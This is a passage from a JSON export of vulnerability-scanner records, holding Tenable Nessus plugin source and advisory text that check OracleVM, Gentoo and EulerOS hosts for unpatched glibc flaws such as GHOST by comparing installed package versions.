detection during dependency sorting\n (#729661)\n\n - ldd: never run file directly (#531160)\n\n - Implement greedy matching of weekday and month names\n (#657570)\n\n - Fix incorrect numeric settings (#675259)\n\n - Implement new mode for NIS passwd.adjunct.byname table\n (#678318)\n\n - Query NIS domain only when needed (#703345)\n\n - Count total processors using sysfs (#706894)\n\n - Translate clone error if necessary (#707998)\n\n - Workaround kernel clobbering robust list (#711531)\n\n - Use correct type when casting d_tag (#599056,\n CVE-2010-0830)\n\n - Report write error in addmnt even for cached streams\n (#688980, CVE-2011-1089)\n\n - Don't underestimate length of DST substitution (#694655)\n\n - Don't allocate executable stack when it cannot be\n allocated in the first 4G (#448011)\n\n - Initialize resolver state in nscd (#676039)\n\n - No cancel signal in unsafe places (#684808)\n\n - Check size of pattern in wide character representation\n in fnmatch (#681054)\n\n - Avoid too much stack use in fnmatch (#681054,\n CVE-2011-1071)\n\n - Properly quote output of locale (#625893, CVE-2011-1095)\n\n - Don't leave empty element in rpath when skipping the\n first element, ignore rpath elements containing\n non-isolated use of $ORIGIN when privileged (#667974,\n CVE-2011-0536)\n\n - Fix handling of newline in addmntent (#559579,\n CVE-2010-0296)\n\n - Don't ignore $ORIGIN in libraries (#670988)\n\n - Fix false assertion (#604796)\n\n - Fix ordering of DSO constructors and destructors\n (#604796)\n\n - Fix typo (#531576)\n\n - Fix concurrency problem between dl_open and\n dl_iterate_phdr (#649956)\n\n - Require suid bit on audit objects in privileged programs\n (#645678, CVE-2010-3856)\n\n - Never expand $ORIGIN in privileged programs (#643819,\n CVE-2010-3847)\n\n - Add timestamps to nscd logs (#527558)\n\n - Fix index wraparound handling in memusage (#531576)\n\n - Handle running out of buffer space with IPv6 mapping\n enabled (#533367)\n\n - Don't deadlock in __dl_iterate_phdr while (un)loading\n objects (#549813)\n\n - Avoid alloca in setenv for long strings (#559974)\n\n - Recognize POWER7 and ISA 2.06 (#563563)\n\n - Add support for AT_BASE_PLATFORM (#563599)\n\n - Restore locking in free_check (#585674)\n\n - Fix lookup of collation sequence value during regexp\n matching (#587360)\n\n - Fix POWER6 memcpy/memset (#579011)\n\n - Fix scope handling during dl_close (#593675)\n\n - Enable -fasynchronous-unwind-tables throughout (#593047)\n\n - Fix crash when aio thread creation fails (#566712)\"\n );\n # https://oss.oracle.com/pipermail/oraclevm-errata/2015-January/000260.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?acafac78\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected glibc / glibc-common / nscd packages.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:H/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Exim GHOST (glibc gethostbyname) Buffer Overflow');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_canvas\", value:\"true\");\n script_set_attribute(attribute:\"canvas_package\", value:'CANVAS');\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:vm:glibc\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:vm:glibc-common\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:vm:nscd\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:oracle:vm_server:3.2\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2010/06/01\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2015/01/30\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2015/02/02\");\n script_set_attribute(attribute:\"in_the_news\", value:\"true\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2015-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"OracleVM Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/OracleVM/release\", \"Host/OracleVM/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/OracleVM/release\");\nif (isnull(release) || \"OVS\" >!< release) audit(AUDIT_OS_NOT, \"OracleVM\");\nif (! preg(pattern:\"^OVS\" + \"3\\.2\" + \"(\\.[0-9]|$)\", string:release)) audit(AUDIT_OS_NOT, \"OracleVM 3.2\", \"OracleVM \" + release);\nif (!get_kb_item(\"Host/OracleVM/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"OracleVM\", cpu);\nif (\"x86_64\" >!< cpu) audit(AUDIT_ARCH_NOT, \"x86_64\", cpu);\n\nflag = 0;\nif (rpm_check(release:\"OVS3.2\", reference:\"glibc-2.5-123.0.1.el5_11.1\")) flag++;\nif (rpm_check(release:\"OVS3.2\", reference:\"glibc-common-2.5-123.0.1.el5_11.1\")) flag++;\nif (rpm_check(release:\"OVS3.2\", reference:\"nscd-2.5-123.0.1.el5_11.1\")) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"glibc / glibc-common / nscd\");\n}\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-01-11T14:50:19", "description": "The remote host is affected by the vulnerability described in GLSA-201503-04 (GNU C Library: Multiple vulnerabilities)\n\n Multiple vulnerabilities have been discovered in the GNU C Library.\n Please review the CVE identifiers referenced below for details.\n Impact :\n\n A local attacker may be able to execute arbitrary code or cause a Denial of Service condition,.\n Workaround :\n\n There is no known workaround at this time.", "cvss3": {}, "published": "2015-03-09T00:00:00", "type": "nessus", "title": "GLSA-201503-04 : GNU C Library: Multiple vulnerabilities (GHOST)", "bulletinFamily": "scanner", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2012-3404", "CVE-2012-3405", "CVE-2012-3406", "CVE-2012-3480", "CVE-2012-4412", "CVE-2012-4424", "CVE-2012-6656", "CVE-2013-0242", "CVE-2013-1914", "CVE-2013-2207", "CVE-2013-4237", "CVE-2013-4332", "CVE-2013-4458", "CVE-2013-4788", "CVE-2014-4043", "CVE-2015-0235"], "modified": "2021-01-11T00:00:00", "cpe": ["p-cpe:/a:gentoo:linux:glibc", "cpe:/o:gentoo:linux"], "id": "GENTOO_GLSA-201503-04.NASL", "href": "https://www.tenable.com/plugins/nessus/81689", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Gentoo Linux Security Advisory GLSA 201503-04.\n#\n# The advisory text is Copyright (C) 2001-2016 Gentoo Foundation, Inc.\n# and licensed under the Creative Commons - Attribution / Share Alike \n# license. See http://creativecommons.org/licenses/by-sa/3.0/\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(81689);\n script_version(\"1.23\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/11\");\n\n script_cve_id(\"CVE-2012-3404\", \"CVE-2012-3405\", \"CVE-2012-3406\", \"CVE-2012-3480\", \"CVE-2012-4412\", \"CVE-2012-4424\", \"CVE-2012-6656\", \"CVE-2013-0242\", \"CVE-2013-1914\", \"CVE-2013-2207\", \"CVE-2013-4237\", \"CVE-2013-4332\", \"CVE-2013-4458\", \"CVE-2013-4788\", \"CVE-2014-4043\", \"CVE-2015-0235\");\n script_bugtraq_id(54374, 54982, 55462, 55543, 57638, 58839, 61183, 61729, 61960, 62324, 63299, 68006, 69470, 72325);\n script_xref(name:\"GLSA\", value:\"201503-04\");\n\n script_name(english:\"GLSA-201503-04 : GNU C Library: Multiple vulnerabilities (GHOST)\");\n script_summary(english:\"Checks for updated package(s) in /var/db/pkg\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\n\"The remote Gentoo host is missing one or more security-related\npatches.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"The remote host is affected by the vulnerability described in GLSA-201503-04\n(GNU C Library: Multiple vulnerabilities)\n\n Multiple vulnerabilities have been discovered in the GNU C Library.\n Please review the CVE identifiers referenced below for details.\n \nImpact :\n\n A local attacker may be able to execute arbitrary code or cause a Denial\n of Service condition,.\n \nWorkaround :\n\n There is no known workaround at this time.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security.gentoo.org/glsa/201503-04\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\n\"All glibc users should upgrade to the latest version:\n # emerge --sync\n # emerge --ask --oneshot --verbose '>=sys-libs/glibc-2.19-r1'\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:H/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Exim GHOST (glibc gethostbyname) Buffer Overflow');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:gentoo:linux:glibc\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:gentoo:linux\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2015/03/08\");\n script_set_attribute(attribute:\"in_the_news\", value:\"true\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2015/03/09\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2015-2021 Tenable Network Security, Inc.\");\n script_family(english:\"Gentoo Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/Gentoo/release\", \"Host/Gentoo/qpkg-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"qpkg.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/Gentoo/release\")) audit(AUDIT_OS_NOT, \"Gentoo\");\nif (!get_kb_item(\"Host/Gentoo/qpkg-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\nflag = 0;\n\nif (qpkg_check(package:\"sys-libs/glibc\", unaffected:make_list(\"ge 2.19-r1\"), vulnerable:make_list(\"lt 2.19-r1\"))) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:qpkg_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = qpkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"GNU C Library\");\n}\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-09-11T00:25:00", "description": "According to the versions of the glibc packages installed, the EulerOS Virtualization installation on the remote host is affected by the following vulnerabilities :\n\n - stdlib/canonicalize.c in the GNU C Library (aka glibc or libc6) 2.27 and earlier, when processing very long pathname arguments to the realpath function, could encounter an integer overflow on 32-bit architectures, leading to a stack-based buffer overflow and, potentially, arbitrary code execution.(CVE-2018-11236)\n\n - An integer overflow vulnerability was found in hcreate() and hcreate_r() functions which could result in an out-of-bounds memory access. This could lead to application crash or, potentially, arbitrary code execution.(CVE-2015-8778)\n\n - A stack-based buffer overflow was found in the way the libresolv library performed dual A/AAAA DNS queries. A remote attacker could create a specially crafted DNS response which could cause libresolv to crash or, potentially, execute code with the permissions of the user running the library. Note: this issue is only exposed when libresolv is called from the nss_dns NSS service module.(CVE-2015-7547)\n\n - A flaw was found in the regular expression matching routines that process multibyte character input. If an application utilized the glibc regular expression matching mechanism, an attacker could provide specially-crafted input that, when processed, would cause the application to crash.(CVE-2013-0242)\n\n - A flaw was found in the way memory was being allocated on the stack for user space binaries. If heap (or different memory region) and stack memory regions were adjacent to each other, an attacker could use this flaw to jump over the stack guard gap, cause controlled memory corruption on process stack or the adjacent memory region, and thus increase their privileges on the system. This is glibc-side mitigation which blocks processing of LD_LIBRARY_PATH for programs running in secure-execution mode and reduces the number of allocations performed by the processing of LD_AUDIT, LD_PRELOAD, and LD_HWCAP_MASK, making successful exploitation of this issue more difficult.(CVE-2017-1000366)\n\n - The DNS stub resolver in the GNU C Library (aka glibc or libc6) before version 2.26, when EDNS support is enabled, will solicit large UDP responses from name servers, potentially simplifying off-path DNS spoofing attacks due to IP fragmentation.(CVE-2017-12132)\n\n - It was found that the files back end of Name Service Switch (NSS) did not isolate iteration over an entire database from key-based look-up API calls. An application performing look-ups on a database while iterating over it could enter an infinite loop, leading to a denial of service.(CVE-2014-8121)\n\n - Stack-based buffer overflow in the getaddrinfo function in sysdeps/posix/getaddrinfo.c in the GNU C Library (aka glibc or libc6) allows remote attackers to cause a denial of service (crash) via vectors involving hostent conversion. NOTE: this vulnerability exists because of an incomplete fix for CVE-2013-4458.(CVE-2016-3706)\n\n - In glibc 2.26 and earlier there is confusion in the usage of getcwd() by realpath() which can be used to write before the destination buffer leading to a buffer underflow and potential code execution.(CVE-2018-1000001)\n\n - Stack-based buffer overflow in string/strcoll_l.c in the GNU C Library (aka glibc or libc6) 2.17 and earlier allows context-dependent attackers to cause a denial of service (crash) or possibly execute arbitrary code via a long string that triggers a malloc failure and use of the alloca function.(CVE-2012-4424)\n\n - It was found that the dynamic loader did not sanitize the LD_POINTER_GUARD environment variable. An attacker could use this flaw to bypass the pointer guarding protection on set-user-ID or set-group-ID programs to execute arbitrary code with the permissions of the user running the application.(CVE-2015-8777)\n\n - The glob function in glob.c in the GNU C Library (aka glibc or libc6) before 2.27 contains a buffer overflow during unescaping of user names with the ~ operator.(CVE-2017-15804)\n\n - res_query in libresolv in glibc before 2.25 allows remote attackers to cause a denial of service (NULL pointer dereference and process crash).(CVE-2015-5180)\n\n - pt_chown in GNU C Library (aka glibc or libc6) before 2.18 does not properly check permissions for tty files, which allows local users to change the permission on the files and obtain access to arbitrary pseudo-terminals by leveraging a FUSE file system.(CVE-2013-2207)\n\n - A stack overflow flaw was found in glibc's swscanf() function. An attacker able to make an application call the swscanf() function could use this flaw to crash that application or, potentially, execute arbitrary code with the permissions of the user running the application.(CVE-2015-1473)\n\n - It was found that getaddrinfo() did not limit the amount of stack memory used during name resolution. An attacker able to make an application resolve an attacker-controlled hostname or IP address could possibly cause the application to exhaust all stack memory and crash.(CVE-2013-4458)\n\n - A heap-based buffer overflow was found in glibc's\n __nss_hostname_digits_dots() function, which is used by the gethostbyname() and gethostbyname2() glibc function calls. A remote attacker able to make an application call either of these functions could use this flaw to execute arbitrary code with the permissions of the user running the application.(CVE-2015-0235)\n\n - Multiple integer overflow flaws, leading to heap-based buffer overflows, were found in glibc's memory allocator functions (pvalloc, valloc, and memalign). If an application used such a function, it could cause the application to crash or, potentially, execute arbitrary code with the privileges of the user running the application.(CVE-2013-4332)\n\n - An integer overflow in the implementation of the posix_memalign in memalign functions in the GNU C Library (aka glibc or libc6) 2.26 and earlier could cause these functions to return a pointer to a heap area that is too small, potentially leading to heap corruption.(CVE-2018-6485)\n\n - A stack based buffer overflow vulnerability was found in the catopen() function. An excessively long string passed to the function could cause it to crash or, potentially, execute arbitrary code.(CVE-2015-8779)\n\nNote that Tenable Network Security has extracted the preceding description block directly from the EulerOS security advisory. Tenable has attempted to automatically clean and format it as much as possible without introducing additional issues.", "cvss3": {}, "published": "2019-05-14T00:00:00", "type": "nessus", "title": "EulerOS Virtualization 3.0.1.0 : glibc (EulerOS-SA-2019-1551)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2012-4424", "CVE-2013-0242", "CVE-2013-2207", "CVE-2013-4332", "CVE-2013-4458", "CVE-2014-8121", "CVE-2015-0235", "CVE-2015-1473", "CVE-2015-5180", "CVE-2015-7547", "CVE-2015-8777", "CVE-2015-8778", "CVE-2015-8779", "CVE-2016-3706", "CVE-2017-1000366", "CVE-2017-12132", "CVE-2017-15804", "CVE-2018-1000001", "CVE-2018-11236", "CVE-2018-6485"], "modified": "2021-02-08T00:00:00", "cpe": ["p-cpe:/a:huawei:euleros:glibc", "p-cpe:/a:huawei:euleros:glibc-common", "p-cpe:/a:huawei:euleros:glibc-devel", "p-cpe:/a:huawei:euleros:glibc-headers", "p-cpe:/a:huawei:euleros:nscd", "cpe:/o:huawei:euleros:uvp:3.0.1.0"], "id": "EULEROS_SA-2019-1551.NASL", "href": "https://www.tenable.com/plugins/nessus/125004", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(125004);\n script_version(\"1.10\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/02/08\");\n\n script_cve_id(\n \"CVE-2012-4424\",\n \"CVE-2013-0242\",\n \"CVE-2013-2207\",\n \"CVE-2013-4332\",\n \"CVE-2013-4458\",\n \"CVE-2014-8121\",\n \"CVE-2015-0235\",\n \"CVE-2015-1473\",\n \"CVE-2015-5180\",\n \"CVE-2015-7547\",\n \"CVE-2015-8777\",\n \"CVE-2015-8778\",\n \"CVE-2015-8779\",\n \"CVE-2016-3706\",\n \"CVE-2017-1000366\",\n \"CVE-2017-12132\",\n \"CVE-2017-15804\",\n \"CVE-2018-1000001\",\n \"CVE-2018-11236\",\n \"CVE-2018-6485\"\n );\n script_bugtraq_id(\n 55543,\n 57638,\n 61960,\n 62324,\n 63299,\n 72325,\n 72499,\n 73038\n );\n\n script_name(english:\"EulerOS Virtualization 3.0.1.0 : glibc (EulerOS-SA-2019-1551)\");\n script_summary(english:\"Checks the rpm output for the updated packages.\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote EulerOS Virtualization host is missing multiple security\nupdates.\");\n script_set_attribute(attribute:\"description\", value:\n\"According to the versions of the glibc packages installed, the\nEulerOS Virtualization installation on the remote host is affected by\nthe following vulnerabilities :\n\n - stdlib/canonicalize.c in the GNU C Library (aka glibc\n or libc6) 2.27 and earlier, when processing very long\n pathname arguments to the realpath function, could\n encounter an integer overflow on 32-bit architectures,\n leading to a stack-based buffer overflow and,\n potentially, arbitrary code execution.(CVE-2018-11236)\n\n - An integer overflow vulnerability was found in\n hcreate() and hcreate_r() functions which could result\n in an out-of-bounds memory access. This could lead to\n application crash or, potentially, arbitrary code\n execution.(CVE-2015-8778)\n\n - A stack-based buffer overflow was found in the way the\n libresolv library performed dual A/AAAA DNS queries. A\n remote attacker could create a specially crafted DNS\n response which could cause libresolv to crash or,\n potentially, execute code with the permissions of the\n user running the library. Note: this issue is only\n exposed when libresolv is called from the nss_dns NSS\n service module.(CVE-2015-7547)\n\n - A flaw was found in the regular expression matching\n routines that process multibyte character input. If an\n application utilized the glibc regular expression\n matching mechanism, an attacker could provide\n specially-crafted input that, when processed, would\n cause the application to crash.(CVE-2013-0242)\n\n - A flaw was found in the way memory was being allocated\n on the stack for user space binaries. If heap (or\n different memory region) and stack memory regions were\n adjacent to each other, an attacker could use this flaw\n to jump over the stack guard gap, cause controlled\n memory corruption on process stack or the adjacent\n memory region, and thus increase their privileges on\n the system. This is glibc-side mitigation which blocks\n processing of LD_LIBRARY_PATH for programs running in\n secure-execution mode and reduces the number of\n allocations performed by the processing of LD_AUDIT,\n LD_PRELOAD, and LD_HWCAP_MASK, making successful\n exploitation of this issue more\n difficult.(CVE-2017-1000366)\n\n - The DNS stub resolver in the GNU C Library (aka glibc\n or libc6) before version 2.26, when EDNS support is\n enabled, will solicit large UDP responses from name\n servers, potentially simplifying off-path DNS spoofing\n attacks due to IP fragmentation.(CVE-2017-12132)\n\n - It was found that the files back end of Name Service\n Switch (NSS) did not isolate iteration over an entire\n database from key-based look-up API calls. An\n application performing look-ups on a database while\n iterating over it could enter an infinite loop, leading\n to a denial of service.(CVE-2014-8121)\n\n - Stack-based buffer overflow in the getaddrinfo function\n in sysdeps/posix/getaddrinfo.c in the GNU C Library\n (aka glibc or libc6) allows remote attackers to cause a\n denial of service (crash) via vectors involving hostent\n conversion. NOTE: this vulnerability exists because of\n an incomplete fix for CVE-2013-4458.(CVE-2016-3706)\n\n - In glibc 2.26 and earlier there is confusion in the\n usage of getcwd() by realpath() which can be used to\n write before the destination buffer leading to a buffer\n underflow and potential code\n execution.(CVE-2018-1000001)\n\n - Stack-based buffer overflow in string/strcoll_l.c in\n the GNU C Library (aka glibc or libc6) 2.17 and earlier\n allows context-dependent attackers to cause a denial of\n service (crash) or possibly execute arbitrary code via\n a long string that triggers a malloc failure and use of\n the alloca function.(CVE-2012-4424)\n\n - It was found that the dynamic loader did not sanitize\n the LD_POINTER_GUARD environment variable. An attacker\n could use this flaw to bypass the pointer guarding\n protection on set-user-ID or set-group-ID programs to\n execute arbitrary code with the permissions of the user\n running the application.(CVE-2015-8777)\n\n - The glob function in glob.c in the GNU C Library (aka\n glibc or libc6) before 2.27 contains a buffer overflow\n during unescaping of user names with the ~\n operator.(CVE-2017-15804)\n\n - res_query in libresolv in glibc before 2.25 allows\n remote attackers to cause a denial of service (NULL\n pointer dereference and process crash).(CVE-2015-5180)\n\n - pt_chown in GNU C Library (aka glibc or libc6) before\n 2.18 does not properly check permissions for tty files,\n which allows local users to change the permission on\n the files and obtain access to arbitrary\n pseudo-terminals by leveraging a FUSE file\n system.(CVE-2013-2207)\n\n - A stack overflow flaw was found in glibc's swscanf()\n function. An attacker able to make an application call\n the swscanf() function could use this flaw to crash\n that application or, potentially, execute arbitrary\n code with the permissions of the user running the\n application.(CVE-2015-1473)\n\n - It was found that getaddrinfo() did not limit the\n amount of stack memory used during name resolution. An\n attacker able to make an application resolve an\n attacker-controlled hostname or IP address could\n possibly cause the application to exhaust all stack\n memory and crash.(CVE-2013-4458)\n\n - A heap-based buffer overflow was found in glibc's\n __nss_hostname_digits_dots() function, which is used by\n the gethostbyname() and gethostbyname2() glibc function\n calls. A remote attacker able to make an application\n call either of these functions could use this flaw to\n execute arbitrary code with the permissions of the user\n running the application.(CVE-2015-0235)\n\n - Multiple integer overflow flaws, leading to heap-based\n buffer overflows, were found in glibc's memory\n allocator functions (pvalloc, valloc, and memalign). If\n an application used such a function, it could cause the\n application to crash or, potentially, execute arbitrary\n code with the privileges of the user running the\n application.(CVE-2013-4332)\n\n - An integer overflow in the implementation of the\n posix_memalign in memalign functions in the GNU C\n Library (aka glibc or libc6) 2.26 and earlier could\n cause these functions to return a pointer to a heap\n area that is too small, potentially leading to heap\n corruption.(CVE-2018-6485)\n\n - A stack based buffer overflow vulnerability was found\n in the catopen() function. An excessively long string\n passed to the function could cause it to crash or,\n potentially, execute arbitrary code.(CVE-2015-8779)\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the EulerOS security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\");\n # https://developer.huaweicloud.com/ict/en/site-euleros/euleros/security-advisories/EulerOS-SA-2019-1551\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?97fa15c6\");\n script_set_attribute(attribute:\"solution\", value:\n\"Update the affected glibc packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:ND\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'glibc realpath() Privilege Escalation');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2019/05/10\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2019/05/14\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:huawei:euleros:glibc\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:huawei:euleros:glibc-common\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:huawei:euleros:glibc-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:huawei:euleros:glibc-headers\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:huawei:euleros:nscd\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:huawei:euleros:uvp:3.0.1.0\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Huawei Local Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2019-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/cpu\", \"Host/EulerOS/release\", \"Host/EulerOS/rpm-list\", \"Host/EulerOS/uvp_version\");\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\n\nrelease = get_kb_item(\"Host/EulerOS/release\");\nif (isnull(release) || release !~ \"^EulerOS\") audit(AUDIT_OS_NOT, \"EulerOS\");\nuvp = get_kb_item(\"Host/EulerOS/uvp_version\");\nif (uvp != \"3.0.1.0\") audit(AUDIT_OS_NOT, \"EulerOS Virtualization 3.0.1.0\");\nif (!get_kb_item(\"Host/EulerOS/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\" && \"aarch64\" >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"EulerOS\", cpu);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_ARCH_NOT, \"i686 / x86_64\", cpu);\n\nflag = 0;\n\npkgs = [\"glibc-2.17-222.h11\",\n \"glibc-common-2.17-222.h11\",\n \"glibc-devel-2.17-222.h11\",\n \"glibc-headers-2.17-222.h11\",\n \"nscd-2.17-222.h11\"];\n\nforeach (pkg in pkgs)\n if (rpm_check(release:\"EulerOS-2.0\", reference:pkg)) flag++;\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : rpm_report_get()\n );\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"glibc\");\n}\n", "cvss": {"score": 10, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-01-11T15:03:37", "description": "The remote host is running a version of Mac OS X 10.9.5 or 10.10.5 that is missing Security Update 2015-004 or 2015-007. It is, therefore, affected by multiple vulnerabilities in the following components :\n\n - Accelerate Framework\n - apache_mod_php\n - ATS\n - Audio\n - CFNetwork\n - CoreGraphics\n - CoreText\n - EFI\n - FontParser\n - Grand Central Dispatch\n - ImageIO\n - IOAcceleratorFamily\n - Kernel\n - libarchive\n - MCX Application Restrictions\n - OpenGL\n\nNote that successful exploitation of the most serious issues can result in arbitrary code execution.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", 